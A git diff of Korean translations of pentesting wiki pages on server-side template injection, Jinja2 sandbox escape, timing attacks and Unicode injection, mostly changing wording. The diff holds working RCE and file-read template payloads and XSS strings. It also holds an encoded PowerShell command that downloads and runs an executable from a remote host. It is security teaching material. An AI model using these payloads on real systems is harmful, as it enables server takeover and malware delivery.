-템플릿 엔진을 식별하려면 오류 메시지를 분석하거나 다양한 언어별 페이로드를 수동으로 테스트해야 합니다. 오류를 유발하는 일반적인 페이로드에는 `${7/0}`, `{{7/0}}`, `<%= 7/0 %>`가 포함됩니다. 수학적 연산에 대한 서버의 응답을 관찰하면 특정 템플릿 엔진을 파악하는 데 도움이 됩니다.
+템플릿 엔진을 식별하기 위해 오류 메시지를 분석하거나 다양한 언어별 페이로드를 수동으로 테스트합니다. 오류를 유발하는 일반적인 페이로드에는 `${7/0}`, `{{7/0}}`, `<%= 7/0 %>`가 포함됩니다. 수학적 연산에 대한 서버의 응답을 관찰하면 특정 템플릿 엔진을 파악하는 데 도움이 됩니다.
 
 #### 페이로드에 의한 식별
 
@@ -170,11 +170,11 @@ ${T(java.lang.Runtime).getRuntime().exec('calc')}
 ${#rt = @java.lang.Runtime@getRuntime(),#rt.exec("calc")}
 ```
 
-Thymeleaf는 이러한 표현식이 특정 속성 내에 배치되어야 합니다. 그러나 _expression inlining_은 다른 템플릿 위치에 대해 지원되며, `[[...]]` 또는 `[(...)]`와 같은 구문을 사용합니다. 따라서 간단한 SSTI 테스트 페이로드는 `[[${7*7}]]`와 같을 수 있습니다.
+Thymeleaf는 이러한 표현식이 특정 속성 내에 배치되도록 요구합니다. 그러나 _expression inlining_은 다른 템플릿 위치에 대해 지원되며, `[[...]]` 또는 `[(...)]`와 같은 구문을 사용합니다. 따라서 간단한 SSTI 테스트 페이로드는 `[[${7*7}]]`와 같을 수 있습니다.
 
 그러나 이 페이로드가 작동할 가능성은 일반적으로 낮습니다. Thymeleaf의 기본 구성은 동적 템플릿 생성을 지원하지 않으며, 템플릿은 미리 정의되어야 합니다. 개발자는 문자열에서 즉석으로 템플릿을 생성하기 위해 자신의 `TemplateResolver`를 구현해야 하며, 이는 드뭅니다.
 
-Thymeleaf는 또한 _expression preprocessing_을 제공하며, 이중 밑줄(`__...__`) 내의 표현식이 전처리됩니다. 이 기능은 Thymeleaf 문서에서 보여준 바와 같이 표현식 구성에 활용될 수 있습니다:
+Thymeleaf는 또한 _expression preprocessing_을 제공하며, 이중 밑줄(`__...__`) 내의 표현식이 전처리됩니다. 이 기능은 표현식 구성에 활용될 수 있으며, Thymeleaf의 문서에서 설명된 바와 같습니다:
 ```java
 #{selection.__${sel.code}__}
 ```
@@ -190,7 +190,7 @@ Thymeleaf는 또한 _expression preprocessing_을 제공하며, 이중 밑줄(`_
 http://localhost:8082/(7*7)
 http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})
 ```
-**더 많은 정보**
+**추가 정보**
 
 - [https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/](https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/)
 
@@ -204,7 +204,7 @@ el-expression-language.md
 ```
 **필터 우회**
 
-여러 변수 표현식을 사용할 수 있으며, `${...}`가 작동하지 않으면 `#{...}`, `*{...}`, `@{...}` 또는 `~{...}`를 시도해 보십시오.
+여러 변수 표현식을 사용할 수 있으며, `${...}`가 작동하지 않으면 `#{...}`, `*{...}`, `@{...}` 또는 `~{...}`를 시도해 보세요.
 
 - `/etc/passwd` 읽기
 ```java
@@ -258,7 +258,7 @@ el-expression-language.md
 
 - `{{ someString.toUPPERCASE() }}`
 
-구버전 Pebble ( < version 3.0.9):
+Pebble의 이전 버전 ( < version 3.0.9):
 ```java
 {{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }}
 ```
@@ -294,7 +294,7 @@ Jinjava는 Hubspot에서 개발한 오픈 소스 프로젝트로, [https://githu
 
 **Jinjava - 명령 실행**
 
-[https://github.com/HubSpot/jinjava/pull/230](https://github.com/HubSpot/jinjava/pull/230)에서 수정됨
+[https://github.com/HubSpot/jinjava/pull/230](https://github.com/HubSpot/jinjava/pull/230)에서 수정됨.
 ```java
 {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
 
@@ -609,12 +609,12 @@ echo $t->finish($t->parse('OUT', 'authors'));
 ```
 **더 많은 정보**
 
-- [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection) 의 Jade 섹션
+- Jade 섹션은 [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)에서 확인할 수 있습니다.
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jade--codepen](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jade--codepen)
 
 ### patTemplate (PHP)
 
-> [patTemplate](https://github.com/wernerwa/pat-template) 비컴파일 PHP 템플릿 엔진으로, XML 태그를 사용하여 문서를 여러 부분으로 나눕니다.
+> [patTemplate](https://github.com/wernerwa/pat-template)는 XML 태그를 사용하여 문서를 여러 부분으로 나누는 비컴파일 PHP 템플릿 엔진입니다.
 ```xml
 <patTemplate:tmpl name="page">
 This is the main page.
@@ -632,7 +632,7 @@ Hello {NAME}.<br/>
 
 ### Handlebars (NodeJS)
 
-경로 탐색 (자세한 정보는 [여기](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/)에서 확인하세요).
+경로 탐색 (자세한 정보는 [여기](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/)를 참조하세요).
 ```bash
 curl -X 'POST' -H 'Content-Type: application/json' --data-binary $'{\"profile\":{"layout\": \"./../routes/index.js\"}}' 'http://ctf.shoebpatel.com:9090/'
 ```
@@ -669,12 +669,12 @@ URLencoded:
 
 ### JsRender (NodeJS)
 
-| **템플릿** | **설명**                               |
-| ---------- | ------------------------------------- |
-|            | 출력 평가 및 렌더링                   |
-|            | HTML 인코딩된 출력 평가 및 렌더링     |
-|            | 주석                                  |
-| 및         | 코드 허용 (기본적으로 비활성화됨)     |
+| **템플릿** | **설명**                             |
+| ---------- | ------------------------------------ |
+|            | 출력 평가 및 렌더링                  |
+|            | HTML 인코딩된 출력 평가 및 렌더링    |
+|            | 주석                                 |
+| 및         | 코드 허용 (기본적으로 비활성화됨)    |
 
 - \= 49
 
@@ -859,7 +859,7 @@ range.constructor(
 
 
 ```
-[**RCE는**](https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/) `__builtins__`에 의존하지 않습니다:
+[**RCE는**](https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/) `__builtins__`에 의존하지 않음:
 ```python
 {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
 {{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}
@@ -909,9 +909,9 @@ ${x}
 - `@(1+2)`
 - `@( //C#Code )`
 - `@System.Diagnostics.Process.Start("cmd.exe","/c echo RCE > C:/Windows/Tasks/test.txt");`
-- `@System.Diagnostics.Process.Start("cmd.exe","/c powershell.exe -enc IABpAHcAcgAgAC0AdQByAGkAIABoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAyAC4AMQAxADEALwB0AGUAcw0AZQB0ADYANAAuAGUAeABlACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAYQBzAGsAcwBcAHQAZQBzAHQAbQBlAHQANgA0AC4AZQB4AGUAOwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXAB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlAA==");`
+- `@System.Diagnostics.Process.Start("cmd.exe","/c powershell.exe -enc IABpAHcAcgAgAC0AdQByAGkAIABoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAyAC4AMQAxADEALwB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAYQBzAGsAcwBcAHQAZQBzAHQAbQBlAHQANgA0AC4AZQB4AGUAOwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXAB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlAA==");`
 
-.NET `System.Diagnostics.Process.Start` 메서드는 서버에서 모든 프로세스를 시작하고 웹쉘을 생성하는 데 사용할 수 있습니다. 취약한 웹앱 예제는 [https://github.com/cnotin/RazorVulnerableApp](https://github.com/cnotin/RazorVulnerableApp)에서 확인할 수 있습니다.
+.NET `System.Diagnostics.Process.Start` 메서드는 서버에서 모든 프로세스를 시작하고 웹쉘을 생성하는 데 사용할 수 있습니다. 취약한 웹앱 예제는 [https://github.com/cnotin/RazorVulnerableApp](https://github.com/cnotin/RazorVulnerableApp)에서 찾을 수 있습니다.
 
 **더 많은 정보**
 
@@ -941,9 +941,9 @@ ${x}
 <%= perl code %>
 <% perl code %>
 ```
-### GO에서의 SSTI
+### SSTI in GO
 
-Go의 템플릿 엔진에서 사용 여부 확인은 특정 페이로드로 수행할 수 있습니다:
+Go의 템플릿 엔진에서 사용 확인은 특정 페이로드로 수행할 수 있습니다:
 
 - `{{ . }}`: 데이터 구조 입력을 드러냅니다. 예를 들어, `Password` 속성이 있는 객체가 전달되면, `{{ .Password }}`가 이를 노출할 수 있습니다.
 - `{{printf "%s" "ssti" }}`: 문자열 "ssti"를 표시할 것으로 예상됩니다.
@@ -951,17 +951,17 @@ Go의 템플릿 엔진에서 사용 여부 확인은 특정 페이로드로 수
 
 <figure><img src="../../images/image (8).png" alt="" width="375"><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*rWpWndkQ7R6FycrgZm4h2A.jpeg">https://miro.medium.com/v2/resize:fit:1100/format:webp/1*rWpWndkQ7R6FycrgZm4h2A.jpeg</a></p></figcaption></figure>
 
-**XSS 취약점 이용**
+**XSS Exploitation**
 
 `text/template` 패키지를 사용하면 페이로드를 직접 삽입하여 XSS를 간단하게 수행할 수 있습니다. 반면, `html/template` 패키지는 응답을 인코딩하여 이를 방지합니다 (예: `{{"<script>alert(1)</script>"}}`는 `&lt;script&gt;alert(1)&lt;/script&gt;`로 결과가 나옵니다). 그럼에도 불구하고 Go에서 템플릿 정의 및 호출은 이 인코딩을 우회할 수 있습니다: \{{define "T1"\}}alert(1)\{{end\}} \{{template "T1"\}}
 
 vbnet Copy code
 
-**RCE 취약점 이용**
+**RCE Exploitation**
 
-RCE 취약점 이용은 `html/template`와 `text/template` 간에 상당히 다릅니다. `text/template` 모듈은 "call" 값을 사용하여 모든 공개 함수를 직접 호출할 수 있지만, `html/template`에서는 허용되지 않습니다. 이러한 모듈에 대한 문서는 [html/template에 대한 여기](https://golang.org/pkg/html/template/)와 [text/template에 대한 여기](https://golang.org/pkg/text/template/)에서 확인할 수 있습니다.
+RCE 취약점은 `html/template`와 `text/template` 간에 상당히 다릅니다. `text/template` 모듈은 "call" 값을 사용하여 모든 공개 함수를 직접 호출할 수 있지만, `html/template`에서는 허용되지 않습니다. 이러한 모듈에 대한 문서는 [html/template에 대한 여기](https://golang.org/pkg/html/template/)와 [text/template에 대한 여기](https://golang.org/pkg/text/template/)에서 확인할 수 있습니다.
 
-Go에서 SSTI를 통한 RCE를 위해 객체 메서드를 호출할 수 있습니다. 예를 들어, 제공된 객체에 명령을 실행하는 `System` 메서드가 있다면, `{{ .System "ls" }}`와 같이 악용할 수 있습니다. 이를 악용하기 위해서는 일반적으로 소스 코드에 접근해야 합니다, 주어진 예와 같이:
+Go에서 SSTI를 통한 RCE를 위해 객체 메서드를 호출할 수 있습니다. 예를 들어, 제공된 객체에 명령을 실행하는 `System` 메서드가 있는 경우, `{{ .System "ls" }}`와 같이 악용할 수 있습니다. 이를 악용하기 위해서는 일반적으로 소스 코드에 접근해야 합니다, 주어진 예와 같이:
 ```go
 func (p Person) Secret (test string) string {
 out, _ := exec.Command(test).CombinedOutput()
diff --git a/src/pentesting-web/ssti-server-side-template-injection/el-expression-language.md b/src/pentesting-web/ssti-server-side-template-injection/el-expression-language.md
index ea1b3fbd7..19aaf7903 100644
--- a/src/pentesting-web/ssti-server-side-template-injection/el-expression-language.md
+++ b/src/pentesting-web/ssti-server-side-template-injection/el-expression-language.md
@@ -15,7 +15,7 @@ Expression Language (EL)은 JavaEE에서 프레젠테이션 레이어(예: 웹 
 - **Spring Framework**: Security 및 Data와 같은 다양한 모듈에서 적용됩니다.
 - **일반 사용**: Java, Kotlin, Scala와 같은 JVM 기반 언어의 개발자들이 SpEL API를 통해 사용합니다.
 
-EL은 JavaEE 기술, 독립 실행 환경에 존재하며, `.jsp` 또는 `.jsf` 파일 확장자, 스택 오류 및 헤더의 "Servlet"과 같은 용어를 통해 인식할 수 있습니다. 그러나 특정 기능과 특정 문자의 사용은 버전 의존적일 수 있습니다.
+EL은 JavaEE 기술, 독립 실행 환경에 존재하며, `.jsp` 또는 `.jsf` 파일 확장자, 스택 오류 및 헤더의 "Servlet"과 같은 용어를 통해 인식할 수 있습니다. 그러나 특정 기능과 특정 문자의 사용은 버전에 따라 다를 수 있습니다.
 
 > [!NOTE]
 > **EL 버전**에 따라 일부 **기능**이 **켜져** 있거나 **꺼져** 있을 수 있으며, 일반적으로 일부 **문자**는 **허용되지 않을 수** 있습니다.
@@ -24,12 +24,14 @@ EL은 JavaEE 기술, 독립 실행 환경에 존재하며, `.jsp` 또는 `.jsf`
 
 (EL에 대한 또 다른 흥미로운 튜토리얼은 [https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=sponsblog/exploiting-ognl-injection-in-apache-struts/](https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=sponsblog/exploiting-ognl-injection-in-apache-struts/)에서 찾을 수 있습니다.)
 
-다음 `Main.java` 파일을 만들기 위해 [**Maven**](https://mvnrepository.com) 저장소에서 jar 파일을 다운로드하세요:
+다음 `Main.java` 파일을 만들기 위해 [**Maven**](https://mvnrepository.com) 저장소에서 jar 파일을 다운로드합니다:
 
 - `commons-lang3-3.9.jar`
 - `spring-core-5.2.1.RELEASE.jar`
 - `commons-logging-1.2.jar`
 - `spring-expression-5.2.1.RELEASE.jar`
+
+그리고 다음 `Main.java` 파일을 생성합니다:
 ```java
 import org.springframework.expression.Expression;
 import org.springframework.expression.ExpressionParser;
@@ -50,7 +52,7 @@ System.out.println(result);
 }
 }
 ```
-다음 코드를 컴파일합니다 (만약 `javac`가 설치되어 있지 않다면, `sudo apt install default-jdk`를 설치하세요):
+다음으로 코드를 컴파일합니다 (만약 `javac`가 설치되어 있지 않다면, `sudo apt install default-jdk`를 설치하세요):
 ```java
 javac -cp commons-lang3-3.9.jar:spring-core-5.2.1.RELEASE.jar:spring-expression-5.2.1.RELEASE.jar:commons-lang3-3.9.jar:commons-logging-1.2.jar:. Main.java
 ```
diff --git a/src/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md b/src/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md
index d21d978cc..5afda2af0 100644
--- a/src/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md
+++ b/src/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md
@@ -60,12 +60,12 @@ app.run()
 ```
 ## **Jinja Injection**
 
-우선, Jinja injection에서는 **샌드박스에서 탈출할 방법을 찾아야** 하며, 일반적인 파이썬 실행 흐름에 접근을 복구해야 합니다. 이를 위해 **객체를 악용해야** 하며, 이 객체들은 **비샌드박스 환경에서 오지만 샌드박스에서 접근할 수 있는** 객체들입니다.
+우선, Jinja injection에서는 **샌드박스에서 탈출할 방법을 찾아야** 하며, 일반적인 파이썬 실행 흐름에 접근을 복구해야 합니다. 이를 위해 **비샌드박스 환경에서 온 객체를 악용해야** 하며, 이 객체는 **샌드박스에서 접근할 수 있습니다**.
 
 ### Global Objects 접근하기
 
-예를 들어, 코드 `render_template("hello.html", username=username, email=email)`에서 객체 username과 email은 **비샌드박스 파이썬 환경에서 오며** **샌드박스 환경 내에서 접근할 수 있습니다.**\
-게다가, **샌드박스 환경에서 항상 접근할 수 있는** 다른 객체들도 있습니다. 이들은:
+예를 들어, 코드 `render_template("hello.html", username=username, email=email)`에서 객체 username과 email은 **비샌드박스 파이썬 환경에서 오며** **샌드박스 환경 내에서 접근할 수 있습니다**.\
+게다가, **샌드박스 환경에서 항상 접근할 수 있는** 다른 객체들도 있습니다. 이러한 객체들은:
 ```
 []
 ''
@@ -76,9 +76,9 @@ request
 ```
 ### Recovering \<class 'object'>
 
-그런 다음, 이러한 객체에서 **`<class 'object'>`** 클래스에 도달해야 정의된 **클래스**를 **복구**하려고 합니다. 이는 이 객체에서 **`__subclasses__`** 메서드를 호출하고 **비샌드박스** python 환경의 모든 클래스를 **접근**할 수 있기 때문입니다.
+그런 다음, 이러한 객체에서 **`<class 'object'>`** 클래스를 얻어 정의된 **클래스**를 **복구**하려고 합니다. 이는 이 객체에서 **`__subclasses__`** 메서드를 호출하고 **비샌드박스**된 파이썬 환경의 모든 클래스를 **접근**할 수 있기 때문입니다.
 
-이 **객체 클래스**에 접근하려면 **클래스 객체**에 접근한 다음 **`__base__`**, **`__mro__()[-1]`** 또는 `.`**`mro()[-1]`**에 접근해야 합니다. 그리고 나서, 이 **객체 클래스**에 도달한 후 **`__subclasses__()`**를 **호출**합니다.
+이 **객체 클래스**에 접근하려면 **클래스 객체**에 접근한 다음 **`__base__`**, **`__mro__()[-1]`** 또는 `.`**`mro()[-1]`**에 접근해야 합니다. 그런 다음, 이 **객체 클래스**에 도달한 후 **`__subclasses__()`**를 **호출**합니다.
 
 이 예제를 확인하세요:
 ```python
@@ -128,7 +128,7 @@ dict.__mro__[-1]
 
 **복구한 후** `<class 'object'>` 및 `__subclasses__`를 호출하면 이제 이러한 클래스를 사용하여 파일을 읽고 쓰고 코드를 실행할 수 있습니다.
 
-`__subclasses__` 호출을 통해 **수백 개의 새로운 함수에 접근할 수 있는 기회**를 얻었으며, 우리는 **파일 클래스**에 접근하여 **파일을 읽고/쓰는 것**이나 **명령을 실행할 수 있는** 클래스에 접근하는 것만으로도 기쁠 것입니다 (예: `os`).
+`__subclasses__` 호출을 통해 **수백 개의 새로운 함수에 접근할 수 있는 기회**를 얻었으며, 우리는 **파일 클래스**에 접근하여 **파일을 읽고/쓰는 것**이나 **명령을 실행할 수 있는** 클래스에 접근하는 것만으로도 기쁨을 느낄 것입니다 (예: `os`).
 
 **원격 파일 읽기/쓰기**
 ```python
@@ -159,7 +159,7 @@ dict.__mro__[-1]
 {{ dict.mro()[-1].__subclasses__()[276](request.args.cmd,shell=True,stdout=-1).communicate()[0].strip() }}
 
 ```
-더 많은 **클래스**를 사용하여 **탈출**하는 방법에 대해 **확인**하려면:
+더 많은 **클래스**를 사용하여 **탈출**하는 방법을 **확인**하려면:
 
 {{#ref}}
 ../../generic-methodologies-and-resources/python/bypass-python-sandboxes/
@@ -169,7 +169,7 @@ dict.__mro__[-1]
 
 #### 일반적인 우회
 
-이 우회는 **일부 문자**를 사용하지 않고도 객체의 **속성**에 **접근**할 수 있게 해줍니다.\
+이러한 우회는 **일부 문자**를 사용하지 않고도 객체의 **속성**에 **접근**할 수 있게 해줍니다.\
 우리는 이미 이전 예제에서 이러한 우회 중 일부를 보았지만, 여기에서 요약해 보겠습니다:
 ```bash
 # Without quotes, _, [, ]
@@ -202,13 +202,13 @@ http://localhost:5000/?c={{request|attr(request.args.getlist(request.args.l)|joi
 
 
 ```
-- [**전역 객체에 접근할 수 있는 더 많은 옵션은 여기에서 확인하세요**](jinja2-ssti.md#accessing-global-objects)
-- [**객체 클래스에 접근할 수 있는 더 많은 옵션은 여기에서 확인하세요**](jinja2-ssti.md#recovering-less-than-class-object-greater-than)
-- [**객체 클래스 없이 RCE를 얻으려면 이 내용을 읽어보세요**](jinja2-ssti.md#jinja-injection-without-less-than-class-object-greater-than)
+- [**전역 객체에 접근할 수 있는 더 많은 옵션은 여기로 돌아가세요**](jinja2-ssti.md#accessing-global-objects)
+- [**객체 클래스에 접근할 수 있는 더 많은 옵션은 여기로 돌아가세요**](jinja2-ssti.md#recovering-less-than-class-object-greater-than)
+- [**객체 클래스 없이 RCE를 얻으려면 이 내용을 읽으세요**](jinja2-ssti.md#jinja-injection-without-less-than-class-object-greater-than)
 
 **HTML 인코딩 피하기**
 
-기본적으로 Flask는 보안상의 이유로 템플릿 내부의 모든 내용을 HTML로 인코딩합니다:
+기본적으로 Flask는 보안을 위해 템플릿 내부의 모든 내용을 HTML로 인코딩합니다:
 ```python
 {{'<script>alert(1);</script>'}}
 #will be
@@ -319,7 +319,7 @@ crack-request: Read a request file for attack
 Read the request in the file, PAYLOADreplace it with the actual payload and submit it
 The request will be urlencoded by default according to the HTTP format, which can be --urlencode-payload 0turned off.
 ```
-## 참고 문헌
+## 참고문헌
 
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2)
 - [여기에서 블랙리스트 문자 우회를 위한 attr 트릭 확인](../../generic-methodologies-and-resources/python/bypass-python-sandboxes/#python3).
diff --git a/src/pentesting-web/timing-attacks.md b/src/pentesting-web/timing-attacks.md
index 5a96cce55..f93a70271 100644
--- a/src/pentesting-web/timing-attacks.md
+++ b/src/pentesting-web/timing-attacks.md
@@ -7,7 +7,7 @@
 
 ## Basic Information
 
-타이밍 공격의 기본 목표는 기본적으로 **유사한 요청의 응답 시간 차이를 확인함으로써 복잡한 질문에 답하거나 숨겨진 기능을 감지하는 것**입니다.
+타이밍 공격의 기본 목표는 기본적으로 **유사한 요청의 응답 시간 차이를 확인하여 복잡한 질문에 답하거나 숨겨진 기능을 감지하는 것**입니다.
 
 전통적으로 이는 네트워크와 서버에서 발생하는 지연과 지터 때문에 매우 복잡했습니다. 그러나 [**Race Condition Single Packet attack**](race-condition.md#http-2-single-packet-attack-vs.-http-1.1-last-byte-synchronization)의 발견과 개선 이후, 이 기술을 사용하여 모든 네트워크 지연을 방정식에서 제거할 수 있게 되었습니다.\
 서버 지연만 남기면 타이밍 공격을 발견하고 악용하기가 더 쉬워집니다.
@@ -26,10 +26,10 @@
 
 같은 연구에서 타이밍 기술이 "범위가 제한된 SSRF"를 발견하는 데 매우 유용하다고 공유되었습니다(이는 허용된 IP/도메인에만 접근할 수 있는 SSRF입니다). 허용된 도메인이 설정된 경우와 허용되지 않은 도메인이 설정된 경우의 **시간 차이를 확인하는 것**이 열려 있는 프록시를 발견하는 데 도움이 됩니다.
 
-범위가 제한된 열린 프록시가 발견되면, 대상의 알려진 하위 도메인을 파싱하여 유효한 대상을 찾을 수 있었고, 이를 통해:
+범위가 제한된 열린 프록시가 발견되면, 알려진 서브도메인을 파싱하여 유효한 대상을 찾을 수 있었고, 이를 통해:
 
-- **열린 프록시**를 통해 인터넷이 아닌 제한된 하위 도메인에 접근하여 **방화벽을 우회**할 수 있습니다.
-- 또한, **열린 프록시**를 악용하여 **내부에서만 접근 가능한 새로운 하위 도메인을 발견**할 수 있습니다.
+- **열린 프록시**를 통해 인터넷이 아닌 제한된 서브도메인에 접근하여 **방화벽을 우회**할 수 있습니다.
+- 또한, **열린 프록시**를 악용하여 **내부에서만 접근 가능한 새로운 서브도메인**을 발견할 수 있습니다.
 - **프론트엔드 사칭 공격**: 프론트엔드 서버는 일반적으로 `X-Forwarded-For` 또는 `X-Real-IP`와 같은 백엔드용 헤더를 추가합니다. 이러한 헤더를 수신하는 열린 프록시는 요청된 엔드포인트에 이를 추가하므로, 공격자는 이러한 헤더를 화이트리스트된 값으로 추가하여 더 많은 내부 도메인에 접근할 수 있습니다.
 
 ## References
diff --git a/src/pentesting-web/unicode-injection/README.md b/src/pentesting-web/unicode-injection/README.md
index 119be488d..00fcf2d90 100644
--- a/src/pentesting-web/unicode-injection/README.md
+++ b/src/pentesting-web/unicode-injection/README.md
@@ -4,13 +4,13 @@
 
 ## 소개
 
-백엔드/프론트엔드가 **이상한 유니코드 문자를 받을 때** 어떻게 동작하는지에 따라 공격자는 **보호를 우회하고 임의의 문자를 주입**할 수 있으며, 이는 XSS 또는 SQLi와 같은 **주입 취약점을 악용**하는 데 사용될 수 있습니다.
+백엔드/프론트엔드가 **이상한 유니코드 문자를 수신할 때** 어떻게 동작하는지에 따라 공격자는 **보호를 우회하고 임의의 문자를 주입**할 수 있으며, 이는 XSS 또는 SQLi와 같은 **주입 취약점을 악용하는 데 사용될 수 있습니다**.
 
 ## 유니코드 정규화
 
 유니코드 정규화는 **유니코드 문자가 ASCII 문자로 정규화될 때** 발생합니다.
 
-이러한 유형의 취약점의 일반적인 시나리오는 시스템이 **확인한 후** 사용자의 **입력**을 **어떤 식으로든 수정**할 때 발생합니다. 예를 들어, 일부 언어에서는 **입력을 대문자 또는 소문자로** 만드는 간단한 호출이 주어진 입력을 정규화하고 **유니코드가 ASCII로 변환**되어 새로운 문자가 생성될 수 있습니다.\
+이러한 유형의 취약점의 일반적인 시나리오는 시스템이 **검사한 후** 사용자 **입력을 어떤 식으로든 수정**할 때 발생합니다. 예를 들어, 일부 언어에서는 **입력을 대문자 또는 소문자로** 만드는 간단한 호출이 주어진 입력을 정규화하고 **유니코드가 ASCII로 변환**되어 새로운 문자가 생성될 수 있습니다.\
 자세한 내용은 다음을 확인하세요:
 
 {{#ref}}
@@ -19,7 +19,7 @@ unicode-normalization.md
 
 ## `\u`에서 `%`로
 
-유니코드 문자는 일반적으로 **`\u` 접두사**로 표현됩니다. 예를 들어 문자 `㱋`는 `\u3c4b`입니다([여기에서 확인](https://unicode-explorer.com/c/3c4B)). 만약 백엔드가 **`\u` 접두사를 `%`로 변환**하면, 결과 문자열은 `%3c4b`가 되며, URL 디코딩하면: **`<4b`**가 됩니다. 그리고, 보시다시피, **`<` 문자가 주입됩니다**.\
+유니코드 문자는 일반적으로 **`\u` 접두사**로 표현됩니다. 예를 들어 문자 `㱋`는 `\u3c4b`입니다([여기에서 확인](https://unicode-explorer.com/c/3c4B)). 만약 백엔드가 **`\u` 접두사를 `%`로 변환**하면, 결과 문자열은 `%3c4b`가 되며, URL 디코딩하면 **`<4b`**가 됩니다. 그리고, 보시다시피, **`<` 문자가 주입됩니다**.\
 백엔드가 취약하다면 이 기술을 사용하여 **어떤 종류의 문자도 주입**할 수 있습니다.\
 필요한 문자를 찾으려면 [https://unicode-explorer.com/](https://unicode-explorer.com/)를 확인하세요.
 
@@ -27,10 +27,10 @@ unicode-normalization.md
 
 ## 이모지 주입
 
-백엔드는 **이모지를 받을 때** 이상하게 동작하는 경우가 있습니다. 연구자가 `💋img src=x onerror=alert(document.domain)//💛`와 같은 페이로드로 XSS를 달성한 [**이 글**](https://medium.com/@fpatrik/how-i-found-an-xss-vulnerability-via-using-emojis-7ad72de49209)에서 발생한 일입니다.
+백엔드는 **이모지를 수신할 때** 이상하게 동작합니다. 연구자가 `💋img src=x onerror=alert(document.domain)//💛`와 같은 페이로드로 XSS를 달성한 [**이 보고서**](https://medium.com/@fpatrik/how-i-found-an-xss-vulnerability-via-using-emojis-7ad72de49209)에서 발생한 일입니다.
 
 이 경우, 서버가 악성 문자를 제거한 후 **Windows-1252에서 UTF-8로 UTF-8 문자열을 변환**했기 때문에 오류가 발생했습니다(기본적으로 입력 인코딩과 변환 인코딩이 불일치했습니다). 그러면 이는 적절한 <를 제공하지 않고 이상한 유니코드 문자 `‹`만 제공합니다.\
-``그래서 그들은 이 출력을 가져와서 **이제 UTF-8에서 ASCII로 다시 변환**했습니다. 이렇게 하면 `‹`가 ` < `로 **정규화**되었고, 이것이 그 시스템에서 익스플로잇이 작동할 수 있는 방법입니다.\
+``그래서 그들은 이 출력을 가져와서 **이제 UTF-8에서 ASCII로 다시 변환**했습니다. 이렇게 하면 `‹`가 `<`로 **정규화**되어 이 시스템에서 익스플로잇이 작동할 수 있었습니다.\
 이것이 발생한 일입니다:
 ```php
 <?php
diff --git a/src/pentesting-web/unicode-injection/unicode-normalization.md b/src/pentesting-web/unicode-injection/unicode-normalization.md
index e191bc252..7eae8a8e9 100644
--- a/src/pentesting-web/unicode-injection/unicode-normalization.md
+++ b/src/pentesting-web/unicode-injection/unicode-normalization.md
@@ -8,16 +8,16 @@
 
 유니코드 정규화는 문자의 서로 다른 이진 표현이 동일한 이진 값으로 표준화되도록 하는 과정입니다. 이 과정은 프로그래밍 및 데이터 처리에서 문자열을 다룰 때 매우 중요합니다. 유니코드 표준은 두 가지 유형의 문자 동등성을 정의합니다:
 
-1. **정준 동등성**: 문자가 인쇄되거나 표시될 때 동일한 모양과 의미를 가지면 정준 동등하다고 간주됩니다.
+1. **정규 동등성**: 문자가 인쇄되거나 표시될 때 동일한 모양과 의미를 가지면 정규 동등한 것으로 간주됩니다.
 2. **호환성 동등성**: 문자가 동일한 추상 문자를 나타낼 수 있지만 다르게 표시될 수 있는 약한 형태의 동등성입니다.
 
-**네 가지 유니코드 정규화 알고리즘**이 있습니다: NFC, NFD, NFKC, NFKD. 각 알고리즘은 정준 및 호환성 정규화 기술을 다르게 적용합니다. 더 깊이 있는 이해를 원하시면 [Unicode.org](https://unicode.org/)에서 이러한 기술을 탐색할 수 있습니다.
+**네 가지 유니코드 정규화 알고리즘**이 있습니다: NFC, NFD, NFKC, NFKD. 각 알고리즘은 정규 및 호환성 정규화 기술을 다르게 적용합니다. 더 깊이 있는 이해를 원하시면 [Unicode.org](https://unicode.org/)에서 이러한 기술을 탐색할 수 있습니다.
 
 ### 유니코드 인코딩에 대한 주요 사항
 
